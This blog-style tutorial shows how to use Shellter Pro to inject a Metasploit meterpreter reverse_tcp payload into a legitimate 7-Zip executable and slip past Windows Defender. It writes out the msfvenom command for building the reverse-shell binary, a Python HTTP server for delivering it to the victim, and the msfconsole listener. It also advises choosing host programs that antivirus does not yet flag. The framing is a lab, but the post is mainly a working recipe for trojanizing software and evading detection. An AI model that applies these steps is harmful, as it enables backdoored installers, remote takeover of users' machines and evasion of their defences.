Using Shellter Pro for dynamic shellcode injection
--
I have decided to move my original blog over to medium for ease of use, so here is an entry I did a while ago on how to use shellter pro for dynamic shellcode injection on https://dmzero.net
We are going to use shellter pro’s auto-mode to inject a listed payload “windows/meterpreter/reverse_tcp” in-to a alpha version of 7-zip. The file that we are going to use has to be 32/bit since there is no support for 64/bit applications at the time of writing. One thing you need to note about using this tool to infect legitimate PE’s, is that you have to use an application that is not flagged by AV for any reason.
What tends to happen is once multiple users start using the same PE for infection and the files get uploaded to tools like virustotal, the detection rates go up. I suggest that if you are testing this out you find a light-weight application and check to see if there are any detections on the file before proceeding. Some of the other articles I am planning to write will cover more advanced capabilities of the tool, we will go through using multiple payload chaining, custom shellcode, and various other options available within the tool.
Lab setup
- Windows 10 Victim — Patched & Running Windows Defender
- Kali Linux waiting to receive shellz
- Shellter
Before we start let's run a quick test to see if Defender is actually able to catch our very basic/generic payload. This is something that should be picked up by many AV vendors, we will also explore how you can take a payload like this and use various techniques to make the payload slip through in later blogs.
First things first, let's generate a generic EXE file with MSFVenom to showcase this:
//msfvenom to generate exe
~/msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exeAfter this, the simplest way to move the file over is by hosting an HTTP server that the victim can download the file from:
//HTTP server setup
~/python -m SimpleHTTPServer 80
We also need to set up our listener on our attacker host:
//msfconsole for our session
~/msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost x.x.x.x
set lport 443And as expected Windows Defender saves the day :)
The idea now is to try some of the magic that Shellter has to offer. We are going to use the standard settings that are available within the tool and see how injecting the same payload gets past Windows Defender.
//Shellter Pro using default configuration
1. Put Shellter in Automatic mode
2. Check online for updates
3. Select PE - 7zip renamed to 1.exe for ease
4. Turn on stealth mode
5 - end Use basic features that ships with the tool
Now that we have our malicious file ready for execution let’s see how Windows Defender handles this. We will copy the file over to our victim machine and execute it.
We use the same configuration for our Metasploit handler:
//msfconsole for our session
~/msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost x.x.x.x
set lport 443
As we can see from the above, the 7zip application functions as expected, and we receive a fully interactive meterpreter shell back to the attacker host :)
That's it for this entry, in some of the future blogs we will look at how some of the more advanced AVs contest against this type of attack.
